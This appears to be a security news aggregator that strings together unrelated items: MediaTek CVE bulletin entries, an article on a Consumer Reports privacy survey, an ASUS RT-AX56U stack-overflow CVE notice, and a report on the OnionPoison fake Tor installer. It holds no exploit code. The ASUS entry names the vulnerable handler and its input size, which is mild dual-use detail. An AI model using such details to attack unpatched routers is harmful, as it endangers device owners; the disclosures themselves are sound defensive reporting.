In wlan, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6769, MT6779, MT6781, MT6785, MT6789, MT6853, MT6855, MT6873, MT6875, MT6879, MT6883, MT6885, MT6889, MT6895, MT6983, MT7663, MT7902, MT7921, MT8167S, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8512A, MT8518, MT8532, MT8667, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789

Affected Software Versions

Android 11.0, 12.0 and Yocto 3.1, 3.3

CVE

**CVE-2022-32589**

Title

Improper resource shutdown or release in Wi-Fi driver

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-404 Improper Resource Shutdown or Release

Description

In Wi-Fi driver, there is a possible way to disconnect Wi-Fi due to an improper resource release. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6873, MT6875, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT7663, MT7668, MT7902, MT7921, MT8167S, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8512A, MT8518, MT8532, MT8667, MT8766, MT8768, MT8786, MT8788, MT8789

Affected Software Versions

Android 11.0, 12.0 and Yocto 3.1, 3.3

CVE

**CVE-2022-32590**

Title

Improper check or handling of exceptional conditions in wlan

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-703 Improper Check or Handling of Exceptional Conditions

Description

In wlan, there is a possible use after free due to an incorrect status check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6761, MT6762, MT6765, MT6768, MT6769, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6877, MT6879, MT6883, MT6885, MT6889, MT6891, MT6893, MT6895, MT6983, MT7663, MT7668, MT7902, MT7921, MT8167S, MT8175, MT8183, MT8185, MT8362A, MT8365, MT8385, MT8512A, MT8518, MT8532, MT8667, MT8695, MT8696, MT8766, MT8768, MT8786, MT8788, MT8789

Affected Software Versions

Android 11.0, 12.0 and Yocto 3.1, 3.3

CVE

**CVE-2022-32591**

Title

Improper input validation in ril

Severity

Medium

Vulnerability Type

DoS

CWE

CWE-20 Improper Input Validation

Description

In ril, there is a possible system crash due to an incorrect bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6580, MT6739, MT6753, MT6757, MT6761, MT6762, MT6763, MT6765, MT6768, MT6779, MT6781, MT6785, MT6789, MT6833, MT6853, MT6853T, MT6855, MT6873, MT6875, MT6877, MT6879, MT6885, MT6893, MT6895, MT6983, MT8321, MT8385, MT8666, MT8675, MT8765, MT8766, MT8768, MT8786, MT8788, MT8789, MT8791, MT8797

Affected Software Versions

Android 11.0, 12.0

CVE

**CVE-2022-32592**

Title

Improper input validation in cpu dvfs

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In cpu dvfs, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6855, MT6879, MT6895, MT6983, MT8185, MT8321, MT8385, MT8518, MT8666, MT8675, MT8765, MT8768, MT8786, MT8788, MT8789

Affected Software Versions

Android 11.0, 12.0 and Yocto 3.1, 3.3

CVE

**CVE-2022-32593**

Title

Improper input validation in vowe

Severity

Medium

Vulnerability Type

EoP

CWE

CWE-20 Improper Input Validation

Description

In vowe, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.

Affected Chipsets

MT6983

Affected Software Versions

Android 12.0

****Vulnerability Type Definition****

Abbreviation

**Definition**

RCE

Remote Code Execution

EoP

Elevation of Privilege

ID

Information Disclosure

DoS

Denial of Service

N/A

Classification not available

****Versions****

**Version**

**Date**

**Description**

1.0

October 3, 2022

Bulletin published.

****Notes****

Information above is generated only at the time of creation of this Security Bulletin. The list of affected chipsets could be not complete. For any further information, device OEMs can reach your MediaTek contact person if needed.

If you want to report a security vulnerability in MediaTek chipsets or products, please go to Report Security Vulnerability page on MediaTek website.

CVE-2022-32593: October 2022

The trend, spotted by Consumer Reports, could mean good news for organizations struggling to contain remote work challenges.

A survey on US consumer attitudes toward online privacy and security holds some potentially good news for enterprise organizations in an era of work-from-home and hybrid work models.

The survey of 2,103 US adults, conducted by Consumer Reports (CR), showed substantial improvement in consumer cybersecurity and privacy practices over the past three years. Many more individuals appear aware of the security and privacy risks associated with their digital footprint, and have modified their behavior significantly to try and protect it better.

Some of the changes — such as a surge in the use of multifactor authentication (MFA) — appear tied to the fact that more and more organizations require it for accessing online accounts and services. That said, a lot of the behavioral changes are likely also being driven by a higher awareness of cyber-risks, several security experts say.

"The harsh reality is that the explosive growth in ransomware attacks and data breaches has raised awareness of cybersecurity to a level we’ve never seen before," says Darren Guccione, CEO and co-founder at Keeper Security. "When people are unable to get fuel at the gas pump or their bank data is leaked on the Dark Web, they immediately understand the tangible impact cyberattacks can have on their personal lives."

The trend has upside for enterprise organizations that are struggling to contain security challenges tied to the use of insecure home networks and devices by their work-from-home and remote employees. It could mean less of an uphill battle for them, says Brian Dunagan, vice president of engineering at Retrospect, a StorCentric company.

It suggests that people are taking communications regarding security directives seriously and are taking the time to read, learn, and ask questions if necessary — which is a notable shift. 

"Now is the time for security leaders to make the case for increased security budgets, whether it is added personnel or added security technology solutions," Dunagan says.

**Significant Security Improvements for Consumers**

When it comes to better consumer adoption of certain security practices, 88% of survey respondents, for instance, said they use what CR describes as strong passwords — eight characters or more, with upper and lowercase letters, numbers, and symbols — to protect access to their Wi-Fi networks. That's up from 74% in the last survey. Similarly, 85%, up from 69%, have implemented measures such as requiring a password, PIN, TouchID, or FaceID to unlock their smartphone.

The survey revealed a greater understanding among US consumers of the potential privacy and security implications of allowing mobile applications the unfettered ability to track their location and movements. Eighty-one percent of consumers now only allow an app to access their location when they are using the application. Eighty percent claimed they did not install applications that they perceived as collecting too much information about them, and 78% block apps from having access to the camera, location, or contacts if they think the app does not require that access.

The numbers in each instance were significantly higher compared with the 2019 survey. For example, just 60% blocked app access to their cameras and contacts three years ago, and 65% ensured a mobile app had access to their location only when the app was in use.

One of the most significant changes was in the use of multifactor authentication: 77% of survey respondents said they now use MFA, up from 50% in 2019. Security experts consider MFA to be a fundamental security best practice for protecting online accounts against takeover and compromise.

"Many products and companies have started to encourage consumers to enable better cyber hygiene," says Amira Dhalla, director of impact partnerships and programs at Consumer Reports. **"**It's common that when you log in to your bank or email account, they encourage or mandate \[that\] you have to use multifactor authentication."

**Consumers Are More in Control, but Work Needs to Be Done**

Dhalla says that CR's survey showed that consumers overall feel more in control of their personal data because of the steps they are taking to control and secure it. 

“As more security and privacy tools have become available and marketed to everyday consumers, they feel they have more at their disposal to combat the security of their data," she notes. "\[They\] are placing more responsibility on themselves to protect themselves.”

At the same time, they are less secure with how companies are handling and storing their data. At least 75% of the respondents in the CR survey expressed concern about the privacy of personal data that companies collected online. "We know consumers are holding themselves more accountable. They just need knowledge and tools to be able to protect themselves more."

Roger Grimes, data-driven defense evangelist at KnowBe4, perceives the improved consumer habits as the result of a trickle-down effect. "What's largely driving the change is businesses are now taking cybersecurity threats more seriously, which trickles down to consumers because they work for those businesses and are impacted as customers," he says. "If your employer is training you to be more cybersecurity aware on the job, those are also skills you can apply at home and teach to your family."

Grimes says while the trends in the CR survey are encouraging, it's also important to view them in the right perspective. He points to the survey's definition of what constitutes a strong password as one example. "Eight-character passwords, even with complexity, are no longer considered secure," he says. "For someone's password to be truly secure it must be 12 characters or longer and fully random or 20 characters or longer if made up out of someone's head."

Similarly, using MFA alone is not sufficient, if it is not also phishing resistant, he says. "Unfortunately, 90% to 95% of MFA is easily phish-able \[and\] no harder to steal or bypass than a password. Telling people to use any MFA is bad advice."

US Consumers Are Finally Becoming More Security & Privacy Conscious

A stack overflow vulnerability exists in the httpd service in ASUS RT-AX56U Router Version 3.0.0.4.386.44266. This vulnerability is caused by the strcat function called by "caupload" input handle function allowing the user to enter 0xFFFF bytes into the stack. This vulnerability allows an attacker to execute commands remotely. The vulnerability requires authentication.

 

 

 

華碩徵才

電競

商用

智慧手機

筆記型電腦

顯示器 / 桌上型電腦

主機板/零組件

網通產品 / IoT / 伺服器

周邊配件

商店

服務&社群

*   功能特色
    
*   產品規格
    
*   評論
    
*   支援
    

購買

網通產品 / IoT / 伺服器

無線路由器

ASUS WiFi 路由器

RT-AX56U

購物和學習

探索更多

*   Asus 設計中心
*   ASUSPRO
*   車用電子
*   Adobe Creative Cloud 購機搭贈

支援與服務

*   維修進度查詢
*   找尋服務據點
*   產品註冊
*   華碩產品保固資訊
*   聯絡我們
*   ASUS 產品安全公告
*   華碩支援YouTube頻道
*   企業租賃
*   線上舊機回收
*   MyASUS app
*   MyASUS in WinRE檢測軟體
*   設備常見問題集

關於我們

*   關於華碩
*   最新消息
*   獎項
*   投資人關係
*   企業社會責任
*   Press Room
*   華碩徵才
*   ASUSTOR Inc.
*   ASUS Cloud Corporation
*   ASUS WebStorage
*   UniMax Electronics Inc.
*   華碩文教基金會

社群

*   
*   
*   

*   
*   
*   

Taiwan / 繁體中文

使用條款

隱私權保護政策

©ASUSTeK Computer Inc. All rights reserved.

CVE-2021-40556: RT-AX56U｜無線路由器｜ASUS 台灣

By Waqas
Threat actors are using YouTube's video description feature to spread the fake Tor browser through a malicious website.
This is a post from HackRead.com Read the original post: OnionPoison – Fake Tor Browser Installer Spreading Malware Via YouTube

Kaspersky cybersecurity researchers have discovered multiple infections through a malicious **TOR browser** installer. The campaign is dubbed OnionPoison, and the installer is being distributed via a Chinese-language YouTube video about the dark web.

The channel boasts over 180,000 subscribers, whereas the video’s view count has exceeded 64,000. It is a damaging discovery for TOR browser users as it is an anonymity-based browser, serving as a gateway to the Dark Web.

The YouTube video from where the malicious and fake Tor browser is being spread (Left) – The malicious .exe download file (Image: Kaspersky)

**What Tor Browser Actually is?**

The Tor Browser is a free and open-source web browser that is based on the Mozilla Firefox web browser. The Tor Browser is designed to protect your privacy and anonymity when using the internet.

The Tor Browser routes your internet traffic through a network of servers, making it difficult for anyone to track your online activity. The Tor Browser is available for Windows, macOS, and Linux.

Tor is short for “The Onion Router”. The Tor network was **originally developed** by the US Naval Research Laboratory as a way to securely communicate between government agencies.

The Tor network consists of a series of volunteer-run servers that route internet traffic through a series of encrypted tunnels. This makes it difficult for anyone to track your online activity or identify your location.

**The TOR-China Connection**

It is worth noting that the Tor browser is banned in China, therefore Chinese residents often resort to innovative ways of downloading it. They mainly access third-party websites for this purpose. Hence, they are more likely to be tricked into downloading the malicious installer. What’s worse, most impacted users are also based in China.

**More Tor Browser News**

1.  Fake Tor browser stole Bitcoins from dark web users
2.  23% of Tor browser relays found to be stealing Bitcoin
3.  8 Best Dark Web Search Engines for Tor Browser (2022)
4.  What Are Dark Web Search Engines and How to Find Them?
5.  Beware – “Fake Tor Browser Rodeo” Scamming Unsuspecting Users

**Difference Between Original and Malicious TOR Installers**

This modified version’s link was posted in January 2022 on a channel that promotes internet anonymity. It is a Chinese-language channel, and the installer was hosted on a Chinese cloud-sharing service.

The difference between the real and modified version was the digital signature, which was missing from the malicious file, and some files were also different from the original. And the version assessed by Kaspersky has less private configuration than the original software.

**Kaspersky Warns about Malicious YouTube Video**

As per Kaspersky’s advisory, the shady YouTube video is spreading a modified version of the TOR browser capable of collecting sensitive data from users in China. This includes internet history and data the user enters into website forms.

The browser collects the data and hides spyware in an accompanying library, which further collects data like computer name and user’s name, location, and MAC addresses of network adapters. Later, it transmits this information to a C2 server.

The malicious website hosting a fake Tor browser (Image: Kaspersky)

Furthermore, it boasts an embedded functionality for executing shell commands, giving the attacker complete control over the device. The video’s description bar gives the link to the infected TOR browser version.

The scammers seem interested in collecting victims’ personal details like social network IDs, Wi-Fi networks, and browsing histories to track them down and discover their identities.

> “The attackers can gather information on the victim’s personal life, his family or home address. Additionally, there are cases when the attacker used the obtained information to blackmail the victim.”
> 
> Kaspersky  

Researchers are warning individuals and companies **against using third-party websites** for downloading software to prevent becoming targets of scammers. It is essential to verify the installers’ authenticity before downloading software that cannot be accessed from official websites. Most importantly, constantly assess digital signatures before installing any app/software.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#wifi